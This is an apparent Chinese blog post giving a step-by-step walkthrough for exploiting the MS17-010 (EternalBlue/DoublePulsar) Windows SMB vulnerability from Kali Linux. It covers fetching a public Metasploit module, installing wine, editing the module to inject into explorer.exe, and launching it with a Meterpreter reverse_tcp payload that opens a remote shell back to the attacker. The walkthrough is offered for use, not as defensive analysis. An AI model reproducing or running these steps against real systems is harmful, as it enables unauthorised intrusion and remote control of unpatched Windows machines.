MS17-010的利用

前言

MS17-010是什么想必大家都不陌生了,前段时间Shadow Broker披露的 Windows漏洞,影响Windows 7和Windows Server 2008大部分版本系统。最近一直没啥时间试试,今天晚上终于找到了合适的时间。

参考了两篇文章

1.http://www.freebuf.com/articles/system/132274.html

2.http://www.freebuf.com/articles/system/132813.html

这两篇文章的方法都需要Python2.6  和 pywin32环境,感觉有些麻烦...这里使用kali来进行MS17-010的利用

1.下载EXP

https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

2.配置环境

64位:

dpkg --add-architecture i386

apt-get update

apt-get install lib32z1 lib32ncurses5

apt-get install wine32

wine cmd.exe

32位:

wine cmd.exe

(吐槽一下,感觉64位配置环境的时间都够下个32位安上了)

3.修改下载的eternalblue_doublepulsar.rb

1.改路径

将/root/Eternalblue-Doublepulsar-Metasploit/deps/改为/usr/share/metasploit-framework/modules/exploits/windows/smb/deps

2.改进程名称

默认进程名称为wlms.exe,建议修改为explorer.exe


3.将文件名称改为方便的名称(我改为了ms17-010.rb)

4.将文件复制到kali的/usr/share/metasploit-framework/modules/exploits/windows/smb/

4.开始利用exp

1.打开msf

2.加载exp

use exploit/windows/smb/ms17-010

3.建立payload

set payload windows/x64/meterpreter/reverse_tcp

4.配置参数

这里就不详细说了,不会的百度

5.执行


成功


最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 转自:http://www.freebuf.com/sectool/105524.html 本文为作者总结自己在渗...
    许安念安阅读 5,736评论 0 10
  • show exploits列出metasploit框架中的所有渗透攻击模块。show payloads列出meta...
    流弊的小白阅读 1,893评论 0 13
  • 使用wine可以在linux下运行windows程序。 root@ubuntu:~# apt-get instal...
    Instu阅读 823评论 0 0
  • 举手投足之间,容纳了一个世界…… 矿上的男人,一般都是皮肤黝黑的,风吹日晒长年累月,慢慢积淀成的。矿上的男人很豪爽...
    月若有情月独吟阅读 475评论 3 1
  • 我早上去辞职,把身份证拿回来。 郑儿还是吃什么吐什么,喝水都吐。 上午洗了三桶衣服床单被褥,这些都是郑儿呕吐所弄脏...
    简宁思静阅读 254评论 0 0